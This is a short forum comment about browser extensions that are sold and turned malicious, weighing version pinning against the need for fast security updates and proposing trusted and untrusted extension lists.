|
|
|
|
|
|
by siegecraft
3262 days ago
|
|
|
Yes, this is the major issue. Authors also can sell their extension, then re-publish their own non-malwared version as an alternative, then just keep doing it over and over again. I wrote some scripts to provide version pinning (just automates the manual editing of the manifests) but then you have to consider critical vulnerabilities in things like the LastPass extension where you absolutely want updates ASAP. So then you either have to have a curated extension list or maybe just separate extensions into "trusted" ie provided by reputable businesses as part of their product (lastpass, okta, etc) and "un-trusted." Even then, if the malware isn't in your face, you have no idea if the pinned version of your un-trusted extensions is actually non-malicious without auditing the code. |
|
|